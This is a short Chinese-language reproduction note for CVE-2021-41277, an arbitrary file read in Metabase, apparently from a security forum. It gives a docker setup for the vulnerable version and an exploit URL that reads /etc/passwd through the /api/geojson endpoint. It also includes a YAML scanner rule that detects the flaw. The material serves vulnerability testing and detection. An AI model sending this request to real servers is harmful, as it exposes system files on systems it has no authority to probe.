MetaBase 任意文件读取漏洞(CVE-2021-41277) 复现
受影响的版本
x.40.0、x.40.1、x.40.2、x.40.3、x.40.4
环境搭建
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
安装完成后
漏洞复现
http://URL+/api/geojson?url=file:/etc/passwd
检测poc规则编写
params: []
name: MetaBase 任意文件读取漏洞(CVE-2021-41277)
set: {}
rules:
- method: GET
path: /api/geojson?url=file:/etc/passwd
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"root")
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
请登录后查看回复内容